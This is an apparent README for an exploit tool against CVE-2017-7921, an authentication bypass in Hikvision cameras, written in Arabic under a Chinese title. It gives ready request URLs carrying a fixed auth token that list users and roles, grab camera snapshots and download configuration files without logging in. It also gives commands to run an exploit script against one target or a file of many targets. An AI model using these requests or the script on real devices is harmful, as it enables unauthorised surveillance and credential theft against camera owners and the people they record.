
海康威视摄像头 CVE-2017-7921-EXP
تم اكتشاف مشكلة مصادقة غير سليمة في أجهزة Hikvision.
تحدث ثغرة المصادقة غير السليمة عندما لا يقوم التطبيق بمصادقة المستخدمين بشكل كافٍ أو صحيح.
قد يسمح هذا لمستخدم ضار بتصعيد صلاحياته على النظام والوصول إلى معلومات حساسة.
https://seclists.org/fulldisclosure/2017/Sep/23
تفاصيل الثغرة:
----------------------
استرجاع قائمة بجميع المستخدمين وأدوارهم:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
الحصول على لقطة من الكاميرا دون مصادقة:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
والأسوأ من ذلك كله، يمكن تنزيل إعدادات الكاميرا:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
